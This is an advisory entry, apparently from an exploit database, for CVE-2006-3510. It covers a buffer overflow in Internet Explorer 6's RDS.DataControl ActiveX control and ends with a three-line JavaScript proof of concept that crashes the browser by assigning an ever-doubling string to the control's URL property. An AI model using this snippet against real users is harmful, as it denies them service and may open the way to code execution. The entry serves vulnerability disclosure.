Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service

Related Vulnerabilities: CVE-2006-3510  
Publish Date: 08 Jul 2006
Author: hdm

Microsoft Internet Explorer 6 is reportedly prone to a denial-of-service vulnerability because the application fails to perform boundary checks before copying user-supplied data into sensitive process buffers.

This issue is triggered when an attacker convinces a victim to activate a malicious ActiveX control object.

Remote attackers may exploit this issue to crash Internet Explorer 6, effectively denying service to legitimate users.

A stack-based heap overflow may be possible; as a result, remote code could run in the context of the user running the affected application. This has not been confirmed.

var a = new ActiveXObject('RDS.DataControl');
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);